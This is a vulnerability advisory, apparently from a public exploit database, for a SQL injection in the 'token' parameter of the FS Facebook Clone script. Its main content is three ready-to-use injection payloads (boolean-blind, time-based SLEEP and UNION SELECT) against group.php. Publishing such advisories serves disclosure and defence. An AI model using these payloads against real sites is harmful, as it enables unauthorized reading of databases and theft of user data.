FS Facebook Clone SQL Injection

2017.12.07
Credit: DanAdeg
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: FS Facebook Clone - 'token' SQL Injection # Date: 2017-12-06 # Exploit Author: DanAdeg # Vendor Homepage: https://fortunescripts.com/ # Software Link: https://fortunescripts.com/product/facebook-clone/ # Version: 2017-12-06 # Tested on: Kali Linux 2.0 (PoC): SQL Injection on GET parameter = token http://localhost/group.php?token= --- Parameter: token (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: token=6595c4ca4238a0b923820dcc509a6f75849b' AND 8810=8810-- IYhZ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: token=6595c4ca4238a0b923820dcc509a6f75849b' AND SLEEP(5)-- Eljm Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: token=-8316' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178767171,0x546d597a6367557a70475a5042514e77654249574c766772746e7a557579724267574a6d59544368,0x71766a6a71),NULL,NULL,NULL,NULL,NULL-- sphZ ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top